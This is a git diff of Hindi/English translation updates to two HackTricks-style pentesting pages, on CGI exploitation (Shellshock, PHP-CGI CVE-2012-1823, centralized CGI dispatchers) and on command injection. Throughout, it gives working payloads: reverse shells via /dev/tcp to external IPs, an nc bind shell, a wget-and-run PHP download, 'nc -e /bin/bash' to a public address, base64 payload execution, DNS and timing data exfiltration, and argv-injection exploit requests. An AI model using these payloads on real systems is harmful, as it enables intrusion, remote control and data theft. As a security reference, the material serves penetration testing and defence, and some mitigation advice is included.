Translated ['', 'src/pentesting-web/command-injection.md', 'src/network-

src/network-services-pentesting/pentesting-web/cgi.md

@@ -1,27 +1,30 @@
+# CGI Pentesting
+
 {{#include ../../banners/hacktricks-training.md}}
 
-# जानकारी
 
-**CGI स्क्रिप्ट पर्ल स्क्रिप्ट हैं**, इसलिए, यदि आपने एक सर्वर को समझौता किया है जो _**.cgi**_ स्क्रिप्ट को निष्पादित कर सकता है, तो आप **पर्ल रिवर्स शेल** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\) **अपलोड कर सकते हैं**, **एक्सटेंशन** को **.pl** से **.cgi** में बदल सकते हैं, **निष्पादन अनुमतियाँ** दे सकते हैं \(`chmod +x`\) और **वेब ब्राउज़र** से रिवर्स शेल **एक्सेस** कर सकते हैं ताकि इसे निष्पादित किया जा सके। 
-**CGI कमजोरियों** के लिए परीक्षण करने के लिए `nikto -C all` \(और सभी प्लगइन्स\) का उपयोग करने की सिफारिश की जाती है।
+## जानकारी
 
-# **शेलशॉक**
+The **CGI scripts are perl scripts**, so, if you have compromised a server that can execute _**.cgi**_ scripts you can **upload a perl reverse shell** (`/usr/share/webshells/perl/perl-reverse-shell.pl`), **change the extension** from **.pl** to **.cgi**, give **execute permissions** (`chmod +x`) and **access** the reverse shell **from the web browser** to execute it.  
+CGI vulns की जाँच के लिए `nikto -C all` (और सभी plugins) का उपयोग करने की सिफारिश की जाती है।
 
-**शेलशॉक** एक **कमजोरी** है जो यूनिक्स-आधारित ऑपरेटिंग सिस्टम में व्यापक रूप से उपयोग किए जाने वाले **Bash** कमांड-लाइन शेल को प्रभावित करती है। यह Bash की उन क्षमताओं को लक्षित करती है जो एप्लिकेशनों द्वारा भेजे गए कमांड को चलाने की होती हैं। यह कमजोरी **पर्यावरण चर** के हेरफेर में निहित है, जो गतिशील नामित मान होते हैं जो यह प्रभावित करते हैं कि कंप्यूटर पर प्रक्रियाएँ कैसे चलती हैं। हमलावर इसको **पर्यावरण चर** में **दुष्ट कोड** संलग्न करके शोषण कर सकते हैं, जो चर प्राप्त करने पर निष्पादित होता है। इससे हमलावरों को संभावित रूप से सिस्टम को समझौता करने की अनुमति मिलती है।
+## **ShellShock**
 
-इस कमजोरी का शोषण करते समय **पृष्ठ एक त्रुटि फेंक सकता है**।
+**ShellShock** एक vulnerability है जो व्यापक रूप से उपयोग किए जाने वाले **Bash** command-line shell को Unix-based operating systems में प्रभावित करती है। यह उन परिस्थितियों को निशाना बनाती है जहाँ Bash को applications द्वारा पास किए गए commands चलाने होते हैं। Vulnerability का मूल कारण **environment variables** का manipulation है, जो dynamic named values होते हैं और यह प्रभावित करते हैं कि कंप्यूटर पर processes कैसे चलते हैं। Attackers इसे exploit कर सकते हैं — environment variables में malicious code attach करके, जो variable मिलने पर execute हो जाता है। इससे attackers सिस्टम को संभावित रूप से compromise कर सकते हैं।
 
-आप इस कमजोरी को यह देखकर **पता लगा सकते हैं** कि यह एक **पुरानी अपाचे संस्करण** और **cgi_mod** \(cgi फ़ोल्डर के साथ\) का उपयोग कर रहा है या **nikto** का उपयोग करके।
+इस vulnerability का exploit करने पर पेज error फेंक सकता है।
 
-## **परीक्षण**
+आप इस vulnerability को इस बात से पा सकते हैं कि यह पुराने **Apache** version और **cgi_mod** (cgi फ़ोल्डर के साथ) का उपयोग कर रहा है, या `nikto` का उपयोग करके।
 
-अधिकांश परीक्षण कुछ को इको करने पर आधारित होते हैं और उम्मीद करते हैं कि वह स्ट्रिंग वेब प्रतिक्रिया में लौटाई जाएगी। यदि आपको लगता है कि एक पृष्ठ कमजोर हो सकता है, तो सभी cgi पृष्ठों की खोज करें और उनका परीक्षण करें।
+### **परीक्षण**
+
+अधिकांश परीक्षणों में कुछ echo किया जाता है और उम्मीद की जाती है कि वह string वेब response में लौटेगी। यदि आपको लगता है कि कोई पेज vulnerable हो सकता है, तो सभी **cgi** पेज खोजें और उनका परीक्षण करें।
 
 **Nmap**
 ```bash
 nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
 ```
-## **Curl \(प्रतिबिंबित, अंधा और आउट-ऑफ-बैंड\)**
+## **Curl \(reflected, blind and out-of-band\)**
 ```bash
 # Reflected
 curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
@@ -34,7 +37,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http:
 ```bash
 python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
 ```
-## शोषण
+### Exploit
 ```bash
 #Bind Shell
 $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8
@@ -48,24 +51,57 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt
 > set rhosts 10.1.2.11
 > run
 ```
-# **Proxy \(MitM से वेब सर्वर अनुरोध\)**
+## केंद्रीकृत CGI डिस्पैचर्स (single endpoint routing via selector parameters)
 
-CGI प्रत्येक हेडर के लिए एक पर्यावरण चर बनाता है जो http अनुरोध में होता है। उदाहरण के लिए: "host:web.com" को "HTTP_HOST"="web.com" के रूप में बनाया जाता है।
+कई embedded web UIs एकल CGI endpoint के पीछे दर्जनों privileged actions को multiplex करते हैं (उदाहरण के लिए, `/cgi-bin/cstecgi.cgi`) और अनुरोध को internal function तक route करने के लिए `topicurl=<handler>` जैसे selector parameter का उपयोग करते हैं।
 
-चूंकि HTTP_PROXY चर का उपयोग वेब सर्वर द्वारा किया जा सकता है। एक **हेडर** भेजने का प्रयास करें जिसमें: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" हो और यदि सर्वर सत्र के दौरान कोई अनुरोध करता है। आप सर्वर द्वारा किए गए प्रत्येक अनुरोध को कैप्चर करने में सक्षम होंगे।
+इन routers को एक्सप्लॉइट करने की कार्यप्रणाली:
 
-# पुराना PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
+- handler नाम गिनें: scrape JS/HTML, brute-force with wordlists, या firmware unpack करके dispatcher द्वारा उपयोग किए गए handler strings के लिए grep करें।
+- Test unauthenticated reachability: कुछ handlers auth checks भूल जाते हैं और सीधे callable होते हैं।
+- उन handlers पर ध्यान दें जो system utilities को invoke करते हैं या files को touch करते हैं; कमजोर validators अक्सर केवल कुछ characters को ही block करते हैं और शायद leading hyphen `-` को मिस कर देते हैं।
 
-बुनियादी रूप से यदि cgi सक्रिय है और php "पुराना" \(&lt;5.3.12 / &lt; 5.4.2\) है तो आप कोड निष्पादित कर सकते हैं।
-इस भेद्यता का लाभ उठाने के लिए आपको वेब सर्वर के कुछ PHP फ़ाइलों तक पहुंच प्राप्त करनी होगी बिना पैरामीटर भेजे \(विशेष रूप से "=" वर्ण भेजे बिना\)।
-फिर, इस भेद्यता का परीक्षण करने के लिए, आप उदाहरण के लिए `/index.php?-s` तक पहुंच सकते हैं \(ध्यान दें `-s`\) और **अनुप्रयोग का स्रोत कोड प्रतिक्रिया में दिखाई देगा**।
+सामान्य exploit रूप:
+```http
+POST /cgi-bin/cstecgi.cgi HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
 
-फिर, **RCE** प्राप्त करने के लिए आप यह विशेष क्वेरी भेज सकते हैं: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` और **PHP कोड** जो **अनुरोध के शरीर में** निष्पादित किया जाना है।
-उदाहरण:**
+# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools
+topicurl=<handler>&param=-n
+
+# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell
+topicurl=setEasyMeshAgentCfg&agentName=;id;
+
+# 3) Validator bypass → arbitrary file write in file-touching handlers
+topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc
+```
+Detection and hardening:
+
+- सेंट्रलाइज़्ड CGI endpoints पर उन प्रमाणीकरणहीन अनुरोधों पर निगरानी रखें जिनमें `topicurl` संवेदनशील handlers पर सेट हो।
+- उन parameters को फ्लैग करें जो `-` से शुरू होते हैं (argv option injection attempts)।
+- विक्रेताओं: सभी state-changing handlers पर authentication लागू करें, कठोर allowlists/types/lengths का उपयोग करके validate करें, और कभी भी user-controlled strings को command-line flags के रूप में पास न करें।
+
+## पुराना PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
+
+Basically if cgi is active and php is "old" \(&lt;5.3.12 / &lt; 5.4.2\) you can execute code.
+इस vulnerability को exploit करने के लिए आपको वेब सर्वर की किसी PHP फ़ाइल तक बिना parameters भेजे पहुँचने की जरूरत है \(विशेषकर बिना "=" कैरेक्टर भेजे\)।
+फिर, इस vulnerability का परीक्षण करने के लिए आप उदाहरण के लिए `/index.php?-s` \(ध्यान दें `-s`\) तक पहुँच सकते हैं और **source code of the application will appear in the response**।
+
+फिर, **RCE** प्राप्त करने के लिए आप यह विशेष query भेज सकते हैं: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` और **PHP code** को request के **body** में भेजें जिससे वह execute हो।
+Example:
 ```bash
 curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
 ```
-**कमजोरी और संभावित शोषणों के बारे में अधिक जानकारी:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF लेखन उदाहरण**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
+**vuln और संभावित exploits के बारे में अधिक जानकारी:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
 
+## **Proxy \(MitM वेब सर्वर अनुरोधों के लिए\)**
+
+CGI http request में प्रत्येक header के लिए एक environment variable बनाता है। उदाहरण के लिए: "host:web.com" को "HTTP_HOST"="web.com" के रूप में बनाया जाता है।
+
+HTTP_PROXY variable का उपयोग web server द्वारा किया जा सकता है। एक **header** भेजने की कोशिश करें जिसमें यह हो: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" और यदि server session के दौरान कोई request करता है, तो आप server द्वारा किए गए प्रत्येक request को कैप्चर कर पाएंगे।
+
+## **संदर्भ**
+
+- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 
 {{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/command-injection.md

@@ -4,11 +4,11 @@
 
 ## command Injection क्या है?
 
-एक **command injection** हमलावर को उस सर्वर पर मनमाने ऑपरेटिंग सिस्टम कमांड्स चलाने की अनुमति देता है जो किसी एप्लिकेशन की होस्टिंग कर रहा होता है। नतीजतन, एप्लिकेशन और उसका सारा डेटा पूरी तरह से समझौता किया जा सकता है। इन कमांड्स के निष्पादन से आमतौर पर हमलावर को एप्लिकेशन के environment और अंतर्निहित सिस्टम पर अनधिकृत पहुँच या नियंत्रण मिल जाता है।
+A **command injection** एक attacker को उस server पर, जो application host कर रहा है, arbitrary operating system commands execute करने की अनुमति देता है। नतीजतन, application और उसके सभी data पूरी तरह compromised हो सकते हैं। इन commands के execution से आमतौर पर attacker को application के environment और underlying system पर unauthorized access या control प्राप्त हो सकता है।
 
-### संदर्भ
+### Context
 
-निर्भर करता है कि **आपका इनपुट कहाँ इंजेक्ट किया जा रहा है**, आपको कमांड्स से पहले **quoted context को समाप्त** (using `"` or `'`) करने की आवश्यकता हो सकती है।
+यह निर्भर करता है कि **आपका input कहाँ inject हो रहा है**, आपको commands से पहले **quoted context को terminate** (using `"` or `'`) करना पड़ सकता है।
 
 ## Command Injection/Execution
 ```bash
@@ -32,7 +32,7 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
 ```
 ### **Limition** Bypasses
 
-यदि आप किसी **linux मशीन के अंदर arbitrary commands** को चलाने की कोशिश कर रहे हैं, तो आप इस **Bypasses:** को पढ़ने में रुचि रखेंगे।
+यदि आप **arbitrary commands inside a linux machine** निष्पादित करने का प्रयास कर रहे हैं, तो आप इस **Bypasses:** के बारे में पढ़ने में रुचि रखेंगे:
 
 {{#ref}}
 ../linux-hardening/bypass-bash-restrictions/
@@ -44,9 +44,9 @@ vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /
 vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
 vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
 ```
-### पैरामीटर्स
+### पैरामीटर
 
-यहाँ शीर्ष 25 पैरामीटर्स दिए गए हैं जो code injection और समान RCE vulnerabilities के लिए संवेदनशील हो सकते हैं (स्रोत: [link](https://twitter.com/trbughunters/status/1283133356922884096)):
+यहाँ शीर्ष 25 पैरामीटर दिए गए हैं जो code injection और समान RCE vulnerabilities के प्रति कमजोर हो सकते हैं (स्रोत: [link](https://twitter.com/trbughunters/status/1283133356922884096)):
 ```
 ?cmd={payload}
 ?exec={payload}
@@ -76,7 +76,7 @@ vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod
 ```
 ### Time based data exfiltration
 
-डेटा निकालना: अक्षर-दर-अक्षर
+डेटा निकालना: char by char
 ```
 swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
 real    0m5.007s
@@ -90,7 +90,7 @@ sys 0m0.000s
 ```
 ### DNS based data exfiltration
 
-यह `https://github.com/HoLyVieR/dnsbin` के टूल पर आधारित है, जो dnsbin.zhack.ca पर भी होस्ट है
+यह टूल `https://github.com/HoLyVieR/dnsbin` पर आधारित है और dnsbin.zhack.ca पर भी होस्ट किया गया है
 ```
 1. Go to http://dnsbin.zhack.ca/
 2. Execute a simple 'ls'
@@ -100,7 +100,7 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
 $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
 ```
-DNS based data exfiltration की जाँच करने के लिए ऑनलाइन टूल्स:
+DNS-आधारित data exfiltration की जाँच के लिए ऑनलाइन टूल्स:
 
 - dnsbin.zhack.ca
 - pingb.in
@@ -119,9 +119,9 @@ powershell C:**2\n??e*d.*? # notepad
 ../linux-hardening/bypass-bash-restrictions/
 {{#endref}}
 
-### Node.js `child_process.exec` vs `execFile`
+### Node.js `child_process.exec` बनाम `execFile`
 
-JavaScript/TypeScript बैक-एंड का ऑडिट करते समय आप अक्सर Node.js `child_process` API का सामना करेंगे।
+JavaScript/TypeScript बैक-एंड का ऑडिट करते समय आप अक्सर Node.js `child_process` API से मिलेंगे।
 ```javascript
 // Vulnerable: user-controlled variables interpolated inside a template string
 const { exec } = require('child_process');
@@ -129,9 +129,9 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay
 /* … */
 });
 ```
-`exec()` एक **shell** (`/bin/sh -c`) को spawn करता है, इसलिए shell को विशेष अर्थ रखने वाले कोई भी प्रतीक (back-ticks, `;`, `&&`, `|`, `$()`, …) तब **command injection** का कारण बनेंगे जब user input स्ट्रिंग में जोड़ दिया जाए।
+`exec()` एक **shell** (`/bin/sh -c`) शुरू करता है, इसलिए shell के लिए special meaning रखने वाले कोई भी character (back-ticks, `;`, `&&`, `|`, `$()`, …) तब **command injection** का कारण बनेंगे जब user input string में concatenated होगा।
 
-**Mitigation:** use `execFile()` (or `spawn()` without the `shell` option) and provide **प्रत्येक argument को एक अलग array element के रूप में** ताकि कोई shell शामिल न हो:
+**Mitigation:** `execFile()` का उपयोग करें (या `spawn()` बिना `shell` option के) और **प्रत्येक argument को अलग array element के रूप में** प्रदान करें ताकि कोई shell शामिल न हो:
 ```javascript
 const { execFile } = require('child_process');
 execFile('/usr/bin/do-something', [
@@ -139,8 +139,37 @@ execFile('/usr/bin/do-something', [
 '--payload', JSON.stringify(payload)
 ]);
 ```
-वास्तविक मामला: *Synology Photos* ≤ 1.7.0-0794 एक अप्रमाणित WebSocket इवेंट के माध्यम से शोषण योग्य था, जिसने हमलावर द्वारा नियंत्रित डेटा को `id_user` में रखा था, जो बाद में `exec()` कॉल में एम्बेड किया गया, जिससे RCE हासिल हुआ (Pwn2Own Ireland 2024).
+Real-world case: *Synology Photos* ≤ 1.7.0-0794 एक unauthenticated WebSocket event के माध्यम से explotible था जिसने attacker controlled डेटा को `id_user` में रख दिया जो बाद में एक `exec()` कॉल में embedded हुआ, और RCE हासिल किया गया (Pwn2Own Ireland 2024).
 
+### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
+
+Not all injections require shell metacharacters. यदि application untrusted strings को system utility को arguments के रूप में पास करता है (यहाँ तक कि `execve`/`execFile` के साथ और no shell होने पर भी), कई प्रोग्राम किसी भी argument को जो `-` या `--` से शुरू होता है, option समझकर parse कर लेते हैं। इससे एक attacker modes बदल सकता है, output paths बदल सकता है, या बिना कभी shell में घुसे खतरनाक व्यवहार trigger कर सकता है।
+
+Typical places where this appears:
+
+- Embedded web UIs/CGI handlers that build commands like `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, etc.
+- Centralized CGI routers (e.g., `/cgi-bin/<something>.cgi` with a selector parameter like `topicurl=<handler>`) where multiple handlers reuse the same weak validator.
+
+What to try:
+
+- Provide values that start with `-`/`--` to be consumed as flags by the downstream tool.
+- Abuse flags that change behavior or write files, for example:
+  - `ping`: `-f`/`-c 100000` डिवाइस पर दबाव डालने के लिए (DoS)
+  - `curl`: `-o /tmp/x` arbitrary paths पर लिखने के लिए, `-K <url>` attacker-controlled config लोड करने के लिए
+  - `tcpdump`: `-G 1 -W 1 -z /path/script.sh` unsafe wrappers में post-rotate execution हासिल करने के लिए
+- If the program supports `--` end-of-options, try to bypass naive mitigations that prepend `--` in the wrong place.
+
+Generic PoC shapes against centralized CGI dispatchers:
+```
+POST /cgi-bin/cstecgi.cgi HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+
+# Flip options in a downstream tool via argv injection
+topicurl=<handler>&param=-n
+
+# Unauthenticated RCE when a handler concatenates into a shell
+topicurl=setEasyMeshAgentCfg&agentName=;id;
+```
 ## Brute-Force डिटेक्शन सूची
 
 
@@ -156,5 +185,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
 - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
 - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
+- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 
 {{#include ../banners/hacktricks-training.md}}